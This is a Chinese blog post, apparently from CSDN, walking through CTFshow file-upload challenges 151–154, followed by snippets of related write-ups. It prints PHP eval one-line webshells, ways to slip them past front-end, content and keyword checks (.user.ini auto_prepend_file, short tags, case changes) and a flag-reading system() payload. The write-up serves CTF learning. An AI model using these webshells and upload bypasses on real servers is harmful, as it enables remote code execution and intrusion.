CTFshow web(文件上传151-154)

最新推荐文章于 2025-05-13 22:39:57 发布
最新推荐文章于 2025-05-13 22:39:57 发布
阅读量1.2k 收藏 10
点赞数 16
CC 4.0 BY-SA版权
文章标签: 前端 php 开发语言 CTFshow web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/csjjjd/article/details/136115060
本文介绍了如何利用前端检查元素功能快速定位上传图片,通过修改后缀和PHP代码上传木马,以及后端检测中的auto_append_file配置技巧。作者分享了解决上传限制和隐藏木马的方法,旨在帮助网络安全学习者提升技能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

                                                                web151

哈,都直接送嘴边了,前端检测领域的问题,那就改前端啊,作者都直接提示了!

第一种方法也是最好用的就是直接把前端内容的png改成php就好

这里教大家一个非常好用的技巧,可以极大节省你的时间,因为代码比较多,你不可能一个个去翻看,所以把鼠标靠近上传图片,然后右键检查元素,就会自动帮你定位,接下来把png改成php,就可以直接上传一句话木马<?php @eval($_POST["a"]); ?> 

ps:当然了,你不直接在前端改也是可以的,这里也是可以写好一句哈木马后以png形式上传,抓包后再把文件后缀改成php也是可以的,然后会返回蚁剑上传的网页网址

后缀加上upload\/111.php就好

还有一个小技巧,翻看flag先看www根目录,flag极大可能都在这,优先翻找,因为文件数还是很大的,别浪费时间。

                                                                web152

好了,人家改题目了,告诉你不能直接前端白嫖了,那就后端把png直接改成php就好了

接下来给了回显

往后面后缀加上upload\/111.php就好

之后蚁剑开始连接就好,注意flag位置

                                                                        web153

老样子,还是那个后端检测。

知识点:

auto_append_file 是 PHP 配置选项之一,在 PHP 脚本执行结束后自动追加执行指定的文件。

当 auto_append_file 配置被设置为一个文件路径时,PHP 将在执行完脚本文件的所有代码后,自动加载并执行指定的文件。

这个配置选项可以用来在每个 PHP 脚本的结尾处执行一些共享的代码逻辑,例如清理工作、记录日志或执行一些全局操作。这样,就不必在每个脚本中显式编写和调用相同的代码,而是通过配置 auto_append_file 来实现统一的处理。

使用方法如下:

  1. 打开 PHP 的配置文件 php.ini

  2. 找到 auto_append_file 配置项。

  3. 将要追加执行的文件路径设置给 auto_append_file 配置项,例如:

    auto_append_file = "/path/to/your/file.php"

  4. 保存文件并重启 PHP 服务。

在接下来的 PHP 脚本执行后,指定的文件将会被自动加载和执行。

实战:先上传 .user.ini 文件,里面写入

 auto_prepend_file=111.png

(#上传时是 .user.png ,抓包修改为 .user.ini)

然后创建一个111.png文件,里面写入一句话木马<?php @eval($_POST["x"]); ?> 

之后访问/upload/

接下来直接蚁剑连接就好

                                                                        web154

刚开始还是像上面的步骤一样

先上传 .user.ini 文件,里面写入

 auto_prepend_file=111.png

(#上传时是 .user.png ,抓包修改为 .user.ini)

然后创建一个111.png文件,里面写入一句话木马<?php @eval($_POST["x"]); ?> 

但是当我到上传111.png时发现文件不合规被禁了,想都不用想,肯定是被看出是木马了,所以这里必须把php去掉,对面识别到php就会提示不合理,无法上传。

这还不简单,换个木马不就好了嘛,

<?= eval($_POST[1]);?>

然后访问upload

接下来直接连接蚁剑就好

真诚地希望我的文章能够帮助大家,谢谢!

补天阁
关注
CTFshow 文件上传 web154
Kradress的博客
02-15 503
目录思路总结 思路 上传一个包含shell的png文件,发现上传失败 清空文件内容,发现上传成功,可能过滤文件中的关键字,经过尝试,猜测文件对php进行过滤,可以用大小写来绕过 shell.png <?phP echo 123;pHpinfo();eval($_POST['cmd']); ?> 发现其他和上题一样,直接上传.user.ini .user.ini auto_prepend_file=shell.png 然后访问/upload/index.php,直接RCE 总结 …
CTFshow 文件上传 Web151-170复现笔记(保姆级复现
2401_83728643的博客
12-31 1559
ctfshow文件上传复现保姆级笔记
ctfshow-web154(文件上传)
m0_62094846的博客
01-18 1006
png上传也会错误,说文件内容不合规 上传个不带木马的文件就可以 说明一句话木马中有敏感信息 使用其他短标签可以绕过 <?= eval($_POST[1]);?> <? eval($_POST[1]);?> <% eval($_POST[1]);%> 传入png的木马文件可以,但是php文件加了png文件头也没用 说明可能php确实就是不能使用 考虑使用配置文件 .user.ini 确认是否可以使用 确实可以,接下来就比较好办了 ...
ctfshow web upload 154 /155.user.ini配置文件+php短标签绕过
最新发布
2403_86685107的博客
05-13 226
2.上传auto_prepend_file=kun.png的kun.png文件(内容为一句话木马<?php@eval($_REQUEST['kun']))时,出现错误。使用bp拦截改名,上传.user.ini文件(具体看153文章)那就使用php的段标签语言进行替代(不出现php敏感词)推测:对文件内容进行了检测,检测出敏感词php。是 PHP 的短输出标签,其作用等同于。,在标准的 PHP 环境里是能够被识别的。1.仍想使用.user.ini文件。4.连接蚁剑->找到flag。
ctfshow-web入门-文件上传web151-web160)
Welcome To Myon'Blog !
07-07 2217
试了下前端只能传 png 后缀的将一句话木马改成 png 后缀,上传后用 burpsuite 抓包绕过前端检测后,改回 php 后缀,发包拿到 flag:ctfshow{e3bd0332-4d5f-4255-941f-a2e6095c4f17}我们还可以直接改它前端验证的代码:原本只支持上传 png 后缀的文件我们加一个 php 后缀进去,即可直接上传 php 后缀的文件。
CTFshow刷题日记-WEB-文件上传
Love&Share
09-08 1574
web151-前端绕过 简单只要在前端把exts:png改成php exts:'php' 访问 /upload/shell.php?shell=system("tac ../flag.php"); web152-content-type绕过 这次不改前端了,直接在bp改,将Content-Type改成 image/png 总结下常见conten-type类型 常见的媒体格式类型如下: text/html : HTML格式 text/plain :纯文本格式 text/xml : XML格式 im
CTFshow-文件上传
qq_61376069的博客
01-22 641
CTFshow入门——文件上传
CTFshow-文件上传web151-160
qq_52579508的博客
08-12 557
提示前端校验不可靠抓包改 后缀webshell连接获取flag。
ctfshow(151-154)--文件上传漏洞--.user.ini
m0_56019217的博客
10-28 830
可以和上一题一样修改前端代码,也可以将shell.php文件的后缀名修改为.png通过前端验证,然后抓包将文件的后缀名修改回去。由于我们是以.png后缀上传的,所以Content-Type的值是image/png,符合服务端要求,文件成功上传。作用为:在访问主页文件时,会自动包含shell.png文件,将其文件内容当做php代码执行。在前端校验的基础上,增加了对请求头中Content-Type的验证。然后用同样的方式绕过前端验证上传shell.png文件。说明只允许上传.png后缀的文件。
CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web(1)
2401_87205009的博客
09-18 458
【代码】CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web(1)
CTFshow文件上传web入门151-161关解密。包教包会!!!!
2301_77578012的博客
05-23 1548
当网站进行扫描时,会将.user.ini文件指向路径内容包含在首页代码处(如index.php、index.html等),使用参数auto_prepend_file(包含至首页文件头部)和auto_append_file(包含在首页文件尾部)进行配置。发送一句话木马,修改content-type值为:image/png,此处注意一下,我直接上传.php文件发现无法通过,定睛一看才发现前端验证还没关,汗颜!上传1.png的木马。2.上传.user.ini文件(使用bp中repaeater重发器功能进行上传)
【CTF】文件上传(知识点+例题)(1)
qq_53099119的博客
03-23 7641
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上传一个名为1.png的木马文件,植入后门,将其上传后,该文件虽文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上传的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
CTFshow Web入门 文件上传
m0_62905261的博客
10-05 977
CTFshow Web入门 文件上传
ctfshow -web文件上传
m0_72898152的博客
02-02 1431
ctf
ctfshow---文件上传
fainpo的博客
04-10 761
来到文件上传了。
ctfshow web入门(文件上传)
Blazing-Angel的博客
07-19 2518
ctfshow 文件上传
ctfshow-web入门 文件上传篇部分题解
volcano的博客
03-06 7350
ctfshow文件上传web151-152web153(.user.ini绕过).user.iniweb154-155(短标签绕过+.user.ini绕过)短标签绕过web156web157-159web160(日志包含绕过)web161web162-163(session文件包含+条件竞争)条件竞争web164(png图片二次渲染绕过)web165(jpg图片二次渲染绕过)web166web167(.htaccess) 文件上传 web151-152 这两题步骤是一样的,先写一个一句话: <?ph
ctfshow web入门 文件上传(持续更新)
Lum1n0us's Blog
03-26 519
文章目录web151-152web153web154-159web160web161 web151-152 hint是前台验证,那么直接先上传.png后缀的图片马,在burp中将.png改为.php即可,然后蚁剑连接拿到flag web153 这题我试了把后缀改为.Php .php2 .phtml 估计是服务器不解析的原因,在访问时只能把他们下载下来,因为这里是nginx,所以试了上传.user.ini,发现可行 我们指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.
ctfshow web入门文件上传蚁剑连接
01-02
### CTFShow Web 入门 文件上传 蚁剑 (AntSword) 连接教程 #### 准备工作 为了成功完成文件上传并利用蚁剑建立连接,需先准备环境。确保已安装蚁剑客户端,并准备好用于测试的恶意PHP脚本。 #### PHP Shell Payload 创建 创建一个简单的PHP反向Shell脚本 `shell.php`: ```php <?php @eval($_POST['cmd']);?> ``` 此代码片段允许通过POST请求执行任意命令[^1]。 #### 文件上传过程 使用给定URL进行文件上传操作。假设目标地址为 `http://example.com/upload` ,则可构造如下表单数据提交至服务器: ```html <form action="http://example.com/upload" method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" value="Upload File" name="submit"> </form> ``` 将之前编写的 `shell.php` 作为待上传文件选择并提交[^2]。 #### 验证上传成果 确认文件是否成功上载到远程服务器指定目录下。通常情况下,可以通过浏览器直接访问该路径来验证,例如:`http://example.com/uploads/shell.php` 。如果页面返回空白,则说明上传成功。 #### 使用蚁剑连接 启动蚁剑工具,在新建站点时输入相应的参数配置: - **网站根目录**: `/var/www/html/` - **WebShell URL**: 如前所述成功的PHP shell链接 - **密码**: 设置于PHP代码中的密钥 (`cmd`) 按照上述设置完成后点击“保存”,随后即可尝试与远端服务器建立会话连接[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值